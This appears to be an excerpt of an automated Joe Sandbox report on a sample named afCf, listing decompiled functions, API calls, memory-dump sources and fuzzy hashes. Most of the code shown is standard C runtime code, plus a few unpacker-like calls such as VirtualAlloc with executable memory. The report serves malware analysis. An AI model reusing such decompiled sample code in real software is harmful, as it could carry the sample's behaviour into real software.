Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 00858356 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085837E
Module32First.KERNEL32(00000000,00000224), ref: 0085839E

Memory Dump Source

Source File: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Offset: 00857000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_857000_afCf.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c67fd692da50ddaadce7009c11f9efb0feba296b8ca29329d2d3b4d6e204426f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 0CF06835100714EFD7203AB59C8DBAE76E8FF49726F100529EA42E11C0DF70E9494651

Uniqueness

Uniqueness Score: -1.00%

Function 00660E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00660223,?,?), ref: 00660E19
SetErrorMode.KERNELBASE(00000000,?,?,00660223,?,?), ref: 00660E1E

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ee078584dca13e788e7d6e14266956c172b54066e7d8b192639a4a5066c8a46f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 8CD0123154512877D7002A94DC09BCE7B1CDF05B62F008421FB0DD9180C771994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Uniqueness

Uniqueness Score: -1.00%

Function 00660920 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00660929

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: fd9d0b8adc6ee4511e0d88a5c93671c763186c68bf04d018142ae61394c9d474
Instruction ID: aa9ae74a4f9dd512805a3ac25890d2e047966d6f9f9abded32641ce094baad92
Opcode Fuzzy Hash: fd9d0b8adc6ee4511e0d88a5c93671c763186c68bf04d018142ae61394c9d474
Instruction Fuzzy Hash: 6E9004703C415011DC303DDC0C01F0540011751734F3007107174FD1F4DC50DF004115

Uniqueness

Uniqueness Score: -1.00%

Function 00858015 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00858066

Memory Dump Source

Source File: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Offset: 00857000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_857000_afCf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 6f86723e0b9422f09094e4c4f9c2bf75ae724210ad6acf8683c93dbd09eb7f24
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: EF113F79A00208EFDB01DF98C985E98BBF5EF08751F158095F948AB361D771EA54DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0066D070 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0067395B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00673970
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 0067397B
GetCurrentProcess.KERNEL32(C0000409), ref: 00673997
TerminateProcess.KERNEL32(00000000), ref: 0067399E

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 70533cb49244659168647d2e956881ae8619b6ceb161c6a67a0618a4ed87ac76
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: 9421D2B8A01204EFD720DF64E94A6857FB0FB08356F904079E50D87762E7B96A82CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x7fac3580
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x7fac3580
				_v812 = _t12;
				_t13 =  *0x422238; // 0x8053ca7f
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00857C33 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp, Offset: 00857000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_857000_afCf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 6930b6fe8ce4ca5ba99d8027fe1f9e99cbbbb8ba2109a381dbbcf1da881d0b26
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 8B118E72344100AFDB44DF59ECC1EA673EAFB89321B2980A5ED08CB312E675EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 00660D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: a60c24d993cbccf98a249165d32e4b252ecb079773f30f13a6df0b1f2fa8fb70
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1A018F76A006148FEB21CF64C804BEB33AAEF86316F4545B5D90A97281E774A9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x7fac3580
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
